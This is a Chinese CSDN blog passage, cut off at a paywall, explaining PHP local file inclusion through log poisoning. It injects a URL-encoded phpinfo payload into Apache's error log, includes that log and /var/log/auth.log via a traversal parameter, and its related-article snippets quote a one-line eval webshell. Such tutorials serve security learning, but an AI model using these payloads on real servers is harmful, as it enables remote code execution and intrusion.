PHP文件包含漏洞 日志

最新推荐文章于 2024-03-07 09:34:13 发布
最新推荐文章于 2024-03-07 09:34:13 发布
阅读量288 收藏 1
点赞数
分类专栏: web漏洞 文章标签: php apache ubuntu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuguojiuai/article/details/121299490
版权
这篇博客探讨了在Ubuntu环境中,由于Apache权限限制,PHP文件包含漏洞如何利用日志进行攻击。通过包含日志文件,攻击者可以尝试写入SSH命令,如在示例中展示的`id;pwd;ls -la /`,以此来获取系统信息或执行恶意操作。
摘要由CSDN通过智能技术生成

一般虚拟主机都有自己独立的日志,是可读可写的 但是UBUNTU默认装的APACHE权限很低,对日志不可读
我们可以包含日志

在这里%3C%3Fphpinfo%28%29%3B%3F%3E这句就是转换过了的<?phpinfo();?>,我们提交

http://www.123.com/%3C%3Fphpinfo%28%29%3B%3F%3E

这样肯定会报出错找不到页面,而一出错就被记在错误日志里了

http://xxx.com/z.php?zizzy=/home/user/www.xxx.com/logs/www-error_log

这样这个日志文件就被包含成了phpinfo的信息,而回显也就成了一个显示php信息的页面。
--------------------

另外的包含假设SSH日志可读 如果你的HTTPD能读当前的SSH日志:
root@ubuntu:/var/log# chmod 777 auth.log

包含他

root@Ubuntu:~# GET http://5.5.5.2/lif.php?file=../../../var/log/auth.log | head
Aug  2 18:55:44 ubuntu sshd[812]: Server listening on 0.0.0.0 port 22.
Aug  2 18:55:44 ubuntu sshd[812]: Server listening on :: port 22.
Aug  2 18:55:55
了解本专栏 订阅专栏 解锁全文 超级会员免费看
小韩韩啊
关注
专栏目录
订阅专栏
php 伪造本地文件包含漏洞的代码
10-28
### PHP 伪造本地文件包含漏洞详解 #### 一、引言 在Web开发领域,PHP是一种广泛使用的服务器端脚本语言。然而,由于其灵活性,PHP应用程序也面临着各种安全威胁,其中“本地文件包含”(Local File Inclusion,...
文件日志包含漏洞
L1ni01
11-16 3566
文件日志包含漏洞 日志包含漏洞原因: 某php文件存在本地文件包含漏洞,但无法上传文件,利用包含漏洞包含Apache(看服务器是Apache还是nginx)日志文件也可以获取WebShell 我们接下来用的服务器是Apache 注意:需要开启apache记录日志功能 访问日志的位置和文件名在不同的系统上会有所差异 apache一般是/var/log/apache/access.log。: nginx的log在/var/log/nginx/access.log和/var/log/nginx/error.log
PHP文件包含漏洞总结
坚持硬核
10-07 3504
首先,我们学习两个函数:require(string) include(string)这两个函数的作用是相同的, 就是将一个文件的内容包含在其所在的php代码中。 例如:我们写了一个1.txt文件放在服务器上,其内容为:<?php phpinfo()?> 当我们去请求这个页面的时候,自然而然,页面会原封不动的将这句话显示出来,那么有什么骚姿势可以让这句话作为php代码被解析呢? 嘿...
【心得】PHP文件包含高级利用攻击面个人笔记
uuzeray的博客
01-03 1376
文件包含文件名可控//用php伪协议 ,可以使用data协议二 文件后缀可控//不能使用伪协议了高级文件包含
使用php编写代码实现伪协议包含日志文件包含
最新发布
活到老学到老
03-07 209
伪协议包含是指利用php的include函数或者require函数来加载远程资源或者本地文件,通过伪协议的形式来指定文件路径。日志文件包含是指通过修改php日志文件路径来实现包含恶意代码。需要注意的是,伪协议包含日志文件包含都是一种安全风险,应当谨慎使用,并对用户输入进行严格的过滤和验证。
thinkphp3.2.3日志包含分析
Sk1y的博客
06-18 1538
thinkphp3.2.3 日志包含执行任意命令分析
08_理论8_文件包含漏洞的原理与实践_20180921
02-10
### 文件包含漏洞的原理与实践 #### 一、文件包含漏洞概述 文件包含漏洞是一种常见的Web应用程序安全漏洞,尤其在使用PHP语言开发的应用程序中较为普遍。这种漏洞允许攻击者通过控制程序中用于指定要包含文件的...
Mang0-php文件包含漏洞.zip
03-12
**PHP文件包含漏洞详解** 在Web开发中,PHP是一种广泛使用的服务器端脚本语言,它提供了许多功能强大的特性,如文件包含(file inclusion)。然而,这些特性如果不慎使用,可能会导致安全问题,其中之一就是“文件...
文件包含技术-常见文件包含
01-24
在Windows系统中,文件包含漏洞可能导致恶意代码访问或修改关键系统文件,如`C:\boot.ini`(启动配置)、`C:\WINDOWS\win.ini`(Windows初始化文件)和`php.ini`(PHP配置文件)。攻击者可能会试图包含这些文件来...
信息安全技术:文件包含漏洞防御措施.pptx
11-01
在信息安全领域,文件包含漏洞是一种常见的安全威胁,它允许攻击者通过操纵动态生成的网页来包含并执行恶意代码。这种漏洞通常发生在Web应用程序中,尤其是那些使用PHP、ASP、JSP等服务器端脚本语言的系统。为了保护...
本地文件包含包含日志获取webshell
WYJ____的博客
08-06 3442
预备知识 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无须再次编写,这种调用文件的过程称为包含。 实验目的 学会包含日志获取webshell 实验工具 浏览器 实验环境 客户机一台 实验步骤 1、访问127.0.0.1/FI/PHP_FI.php?filename=LFI.txt网页显示是文件包含漏洞。 2.浏览器设置代理服务的步骤...
php文件包含日志,ThinkPHP 5日志文件包含trick
weixin_39690391的博客
03-23 265
而且只有触发报错的时候才会写入部分日志信息,如下:而直接用url传入php代码,空格会被urlencode观察日志信息,与及分析代码,可控有蓝色框的请求IP地址,红色圆圈的请求方法,与及后面的host和请求uri对应代码:一个个分析一下:ip可以用X-Forwarded-For等,但最后都过滤了method:host:uri:可以发现可用的选择还挺多的:method可以用X-HTTP-METHOD...
php包含apache日志上马
Coisini的博客
05-24 537
因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。 比如还是这句一句话木马 <?eval($_POST[cmd]);?> 到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句, fopen打开/home/virtual/www.xx...
包含日志文件getshell
weixin_33843947的博客
09-08 1873
包含日志文件getshell 一、包含日志文件漏洞利用概述 当我们没有上传点,并且也没有url_allow_include功能时,我们就可以考虑包含服务器的日志文件。 利用思路也比较简单,当我们访问网站时,服务器的日志中都会记录我们的行为,当我们访问链接中包含PHP一句话木马时,也会被记录到日志中。 这时候我们如果知...
php 写内容到文件,把日志写到log文件
weixin_34074740的博客
06-17 272
php 写内容到文件,把日志写到log文件 1 &lt;?php 2 header("Content-type: text/html; charset=utf-8"); 3 /******************** 4 1、写入内容到文件,追加内容到文件 5 2、打开并读取文件内容 6 ********************/ 7 $file = 'log....
渗透测试-中间件日志包含绕过和php文件读写包含
lza20001103的博客
04-27 1698
文件包含之中间件日志包含绕过
thinkphp日志泄漏漏洞_ThinkPHP5 远程命令执行漏洞分析
weixin_39975529的博客
01-12 940
前言ThinkPHP官方最近修复了一个严重的远程代码执行漏洞。这个主要漏洞原因是由于框架对控制器名没有进行足够的校验导致在没有开启强制路由的情况下可以构造恶意语句执行远程命令,受影响的版本包括5.0和5.1版本。测试环境:ThinkPHP 5.1 beta+ win10 64bit + wamp漏洞分析网上已经有些分析文章了,我就正向分析下这次漏洞过程。不同版本的ThinkPHP调用过程和代码会稍...
文件包含漏洞全面详解
热门推荐
m0_46467017的博客
08-17 7万+
1.文件包含漏洞概述和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含文件,而开发人员又没有对要包含文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。...
文件包含漏洞-日志注入
superman66697的博客
08-16 1519
文件包含漏洞是 Web 应用程序中的一种常见漏洞。当应用程序允许用户控制包含在页面上的文件时,攻击者就可以利用这一点来包含恶意文件。这种恶意文件可能包含执行恶意代码,导致各种攻击,如代码执行、数据泄露或其他未授权的行为。日志注入是通过插入恶意数据到应用程序的日志文件来实施的攻击。当这些日志被其他系统或应用程序读取和解析时,攻击者的恶意数据可能会被执行。这通常利用了不安全的日志处理机制和文件包含漏洞的组合。
php文件包含漏洞(利用phpinfo)
06-28
回答1:</h3><br/>PHP文件包含漏洞是一种常见的Web安全漏洞,攻击者可以利用该漏洞通过包含恶意文件来执行任意代码。其中,利用phpinfo函数可以获取服务器的详细信息,包括PHP版本、操作系统、配置文件路径等,攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小韩韩啊

你的鼓励是对我最大的支持

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值